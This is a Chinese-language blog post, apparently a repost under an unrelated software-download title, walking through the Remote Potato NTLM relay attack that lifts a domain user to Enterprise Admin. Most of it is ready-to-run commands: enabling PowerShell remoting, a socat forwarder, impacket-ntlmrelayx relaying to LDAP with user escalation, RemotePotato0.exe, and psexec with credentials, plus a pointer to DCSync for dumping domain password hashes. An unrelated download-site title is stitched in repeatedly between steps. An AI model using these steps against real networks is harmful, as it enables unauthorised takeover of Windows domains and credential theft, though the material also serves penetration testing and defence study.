todesk官网下载官网(todesk官网下载电脑版)

文章前言

NTLM中继是一种众所周知的技术,主要用于在网络内的服务器上建立某种立足点或用于权限提升,这种攻击在没有为LDAP和SMB协议启用签名的网络中是可行的,此外使用高权限的帐户对服务器和工作站进行身份验证的域管理员可能会给攻击者提供完整域信息泄露的可能性,因为他们的凭据可以通过LSASS或使用Remote Potato技术进行转储

Remote Potato是Antonio Cocomazzi和Andrea Pierini发现的一种技术,它允许攻击者将其权限从域用户提升到Enterprise Admin,此技术执行跨协议中继以实现NTLM反射攻击,并将提升的NTLM身份验证中继到域控制器以实现权限提升

权限提升

前提条件
  • 具有Domain Administrator特权的用户已登录到主机或通过远程桌面登录主机

  • 攻击者已获得对主机的初始访问权限,或者已通过WinRM或SSH访问

  • LDAP和SMB签名未配置

权限提升

Step 1:首先执行以下命令查看域内Domain Administrator特权用户所在主机的PS配置信息:

Get-PSSessionConfiguration

PS:如果没有启用PS可以通过以下命令启动

Enable-PSremotingSet-Item WSMan:\\\\localhost\\\\Client\\\\TrustedHosts -Value 10.0.0.3(攻击主机IP地址)  //主要用于信任并接受来自攻击主机的连接

Step 2:执行以下命令与目标主机建立PowerShell会话

pwshEnter-PSSession -ComputerName 10.0.0.2 -Authentication Negotiate -Credential $(get-credential)

todesk官网下载官网(todesk官网下载电脑版)

Step 3:运行以下命令在终端输出时转为后台作业,并通过socat将传入的流量转发回RPC侦听器

sudo stty -tostopsudo socat TCP-LISTEN:135,fork,reuseaddr TCP:10.0.0.2:9998 &

todesk官网下载官网(todesk官网下载电脑版)

Step 4:在攻击主机上使用一个监听器(HTTP)接收NTLM身份验证并将其中继到DC,这里的域用户\\”pentestlab\\”用于权限提升,10.0.0.1为dc的IP地址

sudo impacket-ntlmrelayx -t ldap://10.0.0.1 --no-wcf-server --escalate-user pentestlab

todesk官网下载官网(todesk官网下载电脑版)

Step 5:在攻击主机的powershell端)执行Remote Potato,这里的两个参数分别为用于接收经过身份验证的呼叫的主机(攻击主机的IP地址)的IP地址和RPC端口

https://github.com/antonioCoco/RemotePotato0

.\\\\RemotePotato0.exe -r 10.0.0.3 -p 9998

todesk官网下载官网(todesk官网下载电脑版)

之后可以检索到NTLM type 3 AUTH身份验证消息,然后将其中继到DC,以便通过LDAP进行身份验证,NTLM type 3 AUTH消息包含客户端对服务器质询的响应、域、用户名和主机信息:

todesk官网下载官网(todesk官网下载电脑版)

目标用户将被添加到Enterprise Admins组,因为DC上的更改将从域管理员的角度执行

todesk官网下载官网(todesk官网下载电脑版)

Step :6:之后执行\\”impacket psexec\\”模块或任何其他连接(RDP到域控制器等)验证用户是否已获得提升的权限,由于用户对域具有复制权限,因此也可以使用DCSync作为更隐蔽的方法来转储来自域的信息(例如域密码散列)

impacket-psexec \\\'purple/pentestlab:Password123@10.0.0.1\\\'

todesk官网下载官网(todesk官网下载电脑版)

当前权限为system权限:

之后pentstlab用户也成为了Enterprise Admin组的一员:

net user pentestlab

演示视频:

相关扩展

当目标域上存在域管理员会话时也可以直接从本地管理员提升到企业管理员(Cross Session Attack):

参考链接

https://labs.sentinelone.com/relaying-potatoes-dce-rpc-ntlm-relay-eop/

Remote Potato – From Domain User to Enterprise Admin

原创文章,作者:七芒星实验室,如若转载,请注明出处:https://www.sudun.com/ask/34291.html

Like (0)
七芒星实验室的头像七芒星实验室
Previous 2024年4月14日
Next 2024年4月14日

相关推荐

  • Rust Vec 索引越界

    起因在前几天,在把C++刷题改为Rust的时候,遇到Vec下标越界的问题,主要是Rust for和C++/C#不太一样,当时在改为Rust代码的时候,粗暴的把f

    2024年9月21日
    0
  • 空气裂化实际案例

    一、Aircrack-ng在无线网络安全测试中的应用1. WEP加密的破解WEP是一种较为简单的无线网络加密方式,其安全性很容易被攻击者攻破。使用Aircrac

    2024年9月19日
    0
  • 学编程对什么科目好

    学习编程可以提高数学、逻辑思维、问题解决、系统设计、逻辑思维等科目的能力特别有用,因为编程需要问题分析和抽象,这是解决复杂问题时的重要技能。 编码训练解决问题的能力。您需要确定问题…

    网站运维 2024年5月12日
    0
  • 国内外代理IP:了解其对比及应用

    国内外代理IP的比较与应用代理IP的基本概念国内代理IP的特点国内代理IP主要是指在中国境内提供的代理服务,其特点包括:稳定性:国内的网络环境相对稳定,许多代理

    2024年9月22日
    0

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注